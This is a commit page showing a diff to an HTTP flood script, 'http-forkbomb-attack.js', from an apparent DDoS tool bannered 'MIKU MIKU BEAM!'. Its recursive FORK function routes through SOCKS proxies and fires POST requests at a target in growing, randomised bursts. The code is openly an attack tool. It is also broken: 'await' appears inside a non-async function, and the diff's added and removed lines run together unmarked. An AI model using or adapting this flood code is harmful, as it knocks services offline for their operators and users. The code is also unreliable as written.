Update http-forkbomb-attack.js

This commit is contained in:
c0d1ng_ma5ter 2025-01-23 07:12:01 -06:00 committed by GitHub
parent ef56c0edc9
commit ae175ec9f3
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -9,13 +9,19 @@ MIKU MIKU BEAM!
import axios from "axios";
import { SocksProxyAgent } from "socks-proxy-agent";
import { parentPort, workerData } from "worker_threads";
let forkStop = 0
import { randomBoolean, randomString } from "../utils/randomUtils.js";
const FORK = (fixedTarget, payload, config) => {
for (let i = 1; i < Math.random() * 100; i++) {
FORK(fixedTarget, payload, config)
await axios.post(fixedTarget, payload, config);
forkStop++
if (forkStop > 200) {
for (let i = 1; i < Math.random() * 100; i++) {
FORK(fixedTarget, payload, config)
await axios.post(fixedTarget, payload, config);
}
} else {
await axios.post(fixedTarget, payload, config);
}
}